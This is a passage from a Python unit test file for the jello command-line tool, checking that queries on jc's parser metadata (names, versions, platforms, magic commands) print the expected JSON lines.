Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"csv","argument":"--csv","version":"1.0","description":"CSV file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the python standard csv library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"df","argument":"--df","version":"1.1","description":"df command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["df"]},{"name":"dig","argument":"--dig","version":"1.1","description":"dig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["dig"]},{"name":"du","argument":"--du","version":"1.1","description":"du command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["du"]},{"name":"env","argument":"--env","version":"1.1","description":"env command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["env"]},{"name":"file","argument":"--file","version":"1.1","description":"file command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["file"]},{"name":"free","argument":"--free","version":"1.0","description":"free command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["free"]},{"name":"fstab","argument":"--fstab","version":"1.0","description":"fstab file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"]},{"name":"group","argument":"--group","version":"1.0","description":"/etc/group file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"gshadow","argument":"--gshadow","version":"1.0","description":"/etc/gshadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd"]},{"name":"history","argument":"--history","version":"1.2","description":"history command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Optimizations by https://github.com/philippeitis","compatible":["linux","darwin","cygwin","aix","freebsd"]},{"name":"hosts","argument":"--hosts","version":"1.0","description":"/etc/hosts file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"id","argument":"--id","version":"1.0","description":"id command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["id"]},{"name":"ifconfig","argument":"--ifconfig","version":"1.5","description":"ifconfig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["ifconfig"]},{"name":"ini","argument":"--ini","version":"1.0","description":"INI file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using configparser from the standard library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"iptables","argument":"--iptables","version":"1.1","description":"iptables command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["iptables"]},{"name":"jobs","argument":"--jobs","version":"1.0","description":"jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["jobs"]},{"name":"last","argument":"--last","version":"1.0","description":"last and lastb command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["last","lastb"]},{"name":"ls","argument":"--ls","version":"1.3","description":"ls command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ls"]},{"name":"lsblk","argument":"--lsblk","version":"1.3","description":"lsblk command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsblk"]},{"name":"lsmod","argument":"--lsmod","version":"1.1","description":"lsmod command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsmod"]},{"name":"lsof","argument":"--lsof","version":"1.0","description":"lsof command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsof"]},{"name":"mount","argument":"--mount","version":"1.1","description":"mount command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["mount"]},{"name":"netstat","argument":"--netstat","version":"1.2","description":"netstat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["netstat"]},{"name":"ntpq","argument":"--ntpq","version":"1.0","description":"ntpq -p command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ntpq"]},{"name":"passwd","argument":"--passwd","version":"1.0","description":"/etc/passwd file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"pip_list","argument":"--pip-list","version":"1.0","description":"pip list command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip list","pip3 list"]},{"name":"pip_show","argument":"--pip-show","version":"1.0","description":"pip show command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip show","pip3 show"]},{"name":"ps","argument":"--ps","version":"1.1","description":"ps command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ps"]},{"name":"route","argument":"--route","version":"1.0","description":"route command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["route"]},{"name":"shadow","argument":"--shadow","version":"1.0","description":"/etc/shadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]},{"name":"ss","argument":"--ss","version":"1.0","description":"ss command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ss"]},{"name":"stat","argument":"--stat","version":"1.0","description":"stat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["stat"]},{"name":"systemctl","argument":"--systemctl","version":"1.0","description":"systemctl command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl"]},{"name":"systemctl_lj","argument":"--systemctl-lj","version":"1.0","description":"systemctl list-jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-jobs"]},{"name":"systemctl_ls","argument":"--systemctl-ls","version":"1.0","description":"systemctl list-sockets command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-sockets"]},{"name":"systemctl_luf","argument":"--systemctl-luf","version":"1.0","description":"systemctl list-unit-files command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-unit-files"]},{"name":"timedatectl","argument":"--timedatectl","version":"1.0","description":"timedatectl status command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["timedatectl","timedatectl status"]},{"name":"uname","argument":"--uname","version":"1.1","description":"uname -a command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["uname"]},{"name":"uptime","argument":"--uptime","version":"1.0","description":"uptime command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["uptime"]},{"name":"w","argument":"--w","version":"1.0","description":"w command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["w"]},{"name":"who","argument":"--who","version":"1.0","description":"who command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["who"]},{"name":"xml","argument":"--xml","version":"1.0","description":"XML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the xmltodict library at https://github.com/martinblech/xmltodict","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]},{"name":"yaml","argument":"--yaml","version":"1.0","description":"YAML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}]
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-c', '_.parsers']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers(self):
"""
Test jc -a | jello -l '_["parsers"]'
"""
self.expected = '''\
{"name":"airport","argument":"--airport","version":"1.0","description":"airport -I command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -I"]}
{"name":"airport_s","argument":"--airport-s","version":"1.0","description":"airport -s command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -s"]}
{"name":"arp","argument":"--arp","version":"1.2","description":"arp command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["arp"]}
{"name":"blkid","argument":"--blkid","version":"1.0","description":"blkid command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["blkid"]}
{"name":"crontab","argument":"--crontab","version":"1.1","description":"crontab command and file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["crontab"]}
{"name":"crontab_u","argument":"--crontab-u","version":"1.0","description":"crontab file parser with user support","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"csv","argument":"--csv","version":"1.0","description":"CSV file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the python standard csv library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"df","argument":"--df","version":"1.1","description":"df command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["df"]}
{"name":"dig","argument":"--dig","version":"1.1","description":"dig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["dig"]}
{"name":"du","argument":"--du","version":"1.1","description":"du command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["du"]}
{"name":"env","argument":"--env","version":"1.1","description":"env command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["env"]}
{"name":"file","argument":"--file","version":"1.1","description":"file command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["file"]}
{"name":"free","argument":"--free","version":"1.0","description":"free command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["free"]}
{"name":"fstab","argument":"--fstab","version":"1.0","description":"fstab file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"]}
{"name":"group","argument":"--group","version":"1.0","description":"/etc/group file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"gshadow","argument":"--gshadow","version":"1.0","description":"/etc/gshadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd"]}
{"name":"history","argument":"--history","version":"1.2","description":"history command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Optimizations by https://github.com/philippeitis","compatible":["linux","darwin","cygwin","aix","freebsd"]}
{"name":"hosts","argument":"--hosts","version":"1.0","description":"/etc/hosts file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"id","argument":"--id","version":"1.0","description":"id command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["id"]}
{"name":"ifconfig","argument":"--ifconfig","version":"1.5","description":"ifconfig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["ifconfig"]}
{"name":"ini","argument":"--ini","version":"1.0","description":"INI file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using configparser from the standard library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"iptables","argument":"--iptables","version":"1.1","description":"iptables command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["iptables"]}
{"name":"jobs","argument":"--jobs","version":"1.0","description":"jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["jobs"]}
{"name":"last","argument":"--last","version":"1.0","description":"last and lastb command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["last","lastb"]}
{"name":"ls","argument":"--ls","version":"1.3","description":"ls command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ls"]}
{"name":"lsblk","argument":"--lsblk","version":"1.3","description":"lsblk command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsblk"]}
{"name":"lsmod","argument":"--lsmod","version":"1.1","description":"lsmod command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsmod"]}
{"name":"lsof","argument":"--lsof","version":"1.0","description":"lsof command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsof"]}
{"name":"mount","argument":"--mount","version":"1.1","description":"mount command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["mount"]}
{"name":"netstat","argument":"--netstat","version":"1.2","description":"netstat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["netstat"]}
{"name":"ntpq","argument":"--ntpq","version":"1.0","description":"ntpq -p command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ntpq"]}
{"name":"passwd","argument":"--passwd","version":"1.0","description":"/etc/passwd file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"pip_list","argument":"--pip-list","version":"1.0","description":"pip list command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip list","pip3 list"]}
{"name":"pip_show","argument":"--pip-show","version":"1.0","description":"pip show command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip show","pip3 show"]}
{"name":"ps","argument":"--ps","version":"1.1","description":"ps command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ps"]}
{"name":"route","argument":"--route","version":"1.0","description":"route command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["route"]}
{"name":"shadow","argument":"--shadow","version":"1.0","description":"/etc/shadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"ss","argument":"--ss","version":"1.0","description":"ss command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ss"]}
{"name":"stat","argument":"--stat","version":"1.0","description":"stat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["stat"]}
{"name":"systemctl","argument":"--systemctl","version":"1.0","description":"systemctl command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl"]}
{"name":"systemctl_lj","argument":"--systemctl-lj","version":"1.0","description":"systemctl list-jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-jobs"]}
{"name":"systemctl_ls","argument":"--systemctl-ls","version":"1.0","description":"systemctl list-sockets command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-sockets"]}
{"name":"systemctl_luf","argument":"--systemctl-luf","version":"1.0","description":"systemctl list-unit-files command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-unit-files"]}
{"name":"timedatectl","argument":"--timedatectl","version":"1.0","description":"timedatectl status command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["timedatectl","timedatectl status"]}
{"name":"uname","argument":"--uname","version":"1.1","description":"uname -a command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["uname"]}
{"name":"uptime","argument":"--uptime","version":"1.0","description":"uptime command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["uptime"]}
{"name":"w","argument":"--w","version":"1.0","description":"w command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["w"]}
{"name":"who","argument":"--who","version":"1.0","description":"who command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["who"]}
{"name":"xml","argument":"--xml","version":"1.0","description":"XML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the xmltodict library at https://github.com/martinblech/xmltodict","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"yaml","argument":"--yaml","version":"1.0","description":"YAML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
'''
f = io.StringIO()
with contextlib.redirect_stdout(f):
testargs = ['jello', '-l', '_["parsers"]']
with patch.object(sys, 'argv', testargs):
_ = jello.cli.main(data=self.jc_a_output)
self.assertEqual(f.getvalue(), self.expected)
def test_jc_a_l_parsers_dot(self):
"""
Test jc -a | jello -l _.parsers
"""
self.expected = '''\
{"name":"airport","argument":"--airport","version":"1.0","description":"airport -I command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -I"]}
{"name":"airport_s","argument":"--airport-s","version":"1.0","description":"airport -s command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["darwin"],"magic_commands":["airport -s"]}
{"name":"arp","argument":"--arp","version":"1.2","description":"arp command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["arp"]}
{"name":"blkid","argument":"--blkid","version":"1.0","description":"blkid command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["blkid"]}
{"name":"crontab","argument":"--crontab","version":"1.1","description":"crontab command and file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["crontab"]}
{"name":"crontab_u","argument":"--crontab-u","version":"1.0","description":"crontab file parser with user support","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"csv","argument":"--csv","version":"1.0","description":"CSV file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the python standard csv library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"df","argument":"--df","version":"1.1","description":"df command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["df"]}
{"name":"dig","argument":"--dig","version":"1.1","description":"dig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["dig"]}
{"name":"du","argument":"--du","version":"1.1","description":"du command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["du"]}
{"name":"env","argument":"--env","version":"1.1","description":"env command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["env"]}
{"name":"file","argument":"--file","version":"1.1","description":"file command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["file"]}
{"name":"free","argument":"--free","version":"1.0","description":"free command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["free"]}
{"name":"fstab","argument":"--fstab","version":"1.0","description":"fstab file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"]}
{"name":"group","argument":"--group","version":"1.0","description":"/etc/group file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"gshadow","argument":"--gshadow","version":"1.0","description":"/etc/gshadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","aix","freebsd"]}
{"name":"history","argument":"--history","version":"1.2","description":"history command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Optimizations by https://github.com/philippeitis","compatible":["linux","darwin","cygwin","aix","freebsd"]}
{"name":"hosts","argument":"--hosts","version":"1.0","description":"/etc/hosts file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"id","argument":"--id","version":"1.0","description":"id command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["id"]}
{"name":"ifconfig","argument":"--ifconfig","version":"1.5","description":"ifconfig command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser","compatible":["linux","aix","freebsd","darwin"],"magic_commands":["ifconfig"]}
{"name":"ini","argument":"--ini","version":"1.0","description":"INI file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using configparser from the standard library","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"iptables","argument":"--iptables","version":"1.1","description":"iptables command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["iptables"]}
{"name":"jobs","argument":"--jobs","version":"1.0","description":"jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["jobs"]}
{"name":"last","argument":"--last","version":"1.0","description":"last and lastb command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"],"magic_commands":["last","lastb"]}
{"name":"ls","argument":"--ls","version":"1.3","description":"ls command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ls"]}
{"name":"lsblk","argument":"--lsblk","version":"1.3","description":"lsblk command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsblk"]}
{"name":"lsmod","argument":"--lsmod","version":"1.1","description":"lsmod command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsmod"]}
{"name":"lsof","argument":"--lsof","version":"1.0","description":"lsof command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["lsof"]}
{"name":"mount","argument":"--mount","version":"1.1","description":"mount command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["mount"]}
{"name":"netstat","argument":"--netstat","version":"1.2","description":"netstat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["netstat"]}
{"name":"ntpq","argument":"--ntpq","version":"1.0","description":"ntpq -p command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ntpq"]}
{"name":"passwd","argument":"--passwd","version":"1.0","description":"/etc/passwd file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"pip_list","argument":"--pip-list","version":"1.0","description":"pip list command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip list","pip3 list"]}
{"name":"pip_show","argument":"--pip-show","version":"1.0","description":"pip show command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","win32","aix","freebsd"],"magic_commands":["pip show","pip3 show"]}
{"name":"ps","argument":"--ps","version":"1.1","description":"ps command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["ps"]}
{"name":"route","argument":"--route","version":"1.0","description":"route command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["route"]}
{"name":"shadow","argument":"--shadow","version":"1.0","description":"/etc/shadow file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","aix","freebsd"]}
{"name":"ss","argument":"--ss","version":"1.0","description":"ss command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["ss"]}
{"name":"stat","argument":"--stat","version":"1.0","description":"stat command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["stat"]}
{"name":"systemctl","argument":"--systemctl","version":"1.0","description":"systemctl command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl"]}
{"name":"systemctl_lj","argument":"--systemctl-lj","version":"1.0","description":"systemctl list-jobs command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-jobs"]}
{"name":"systemctl_ls","argument":"--systemctl-ls","version":"1.0","description":"systemctl list-sockets command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-sockets"]}
{"name":"systemctl_luf","argument":"--systemctl-luf","version":"1.0","description":"systemctl list-unit-files command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["systemctl list-unit-files"]}
{"name":"timedatectl","argument":"--timedatectl","version":"1.0","description":"timedatectl status command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux"],"magic_commands":["timedatectl","timedatectl status"]}
{"name":"uname","argument":"--uname","version":"1.1","description":"uname -a command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin"],"magic_commands":["uname"]}
{"name":"uptime","argument":"--uptime","version":"1.0","description":"uptime command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["uptime"]}
{"name":"w","argument":"--w","version":"1.0","description":"w command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["w"]}
{"name":"who","argument":"--who","version":"1.0","description":"who command parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","compatible":["linux","darwin","cygwin","aix","freebsd"],"magic_commands":["who"]}
{"name":"xml","argument":"--xml","version":"1.0","description":"XML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the xmltodict library at https://github.com/martinblech/xmltodict","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
{"name":"yaml","argument":"--yaml","version":"1.0","description":"YAML file parser","author":"Kelly Brazil","author_email":"kellyjonbrazil@gmail.com","details":"Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml","compatible":["linux","darwin","cygwin","win32","aix","freebsd"]}
'''
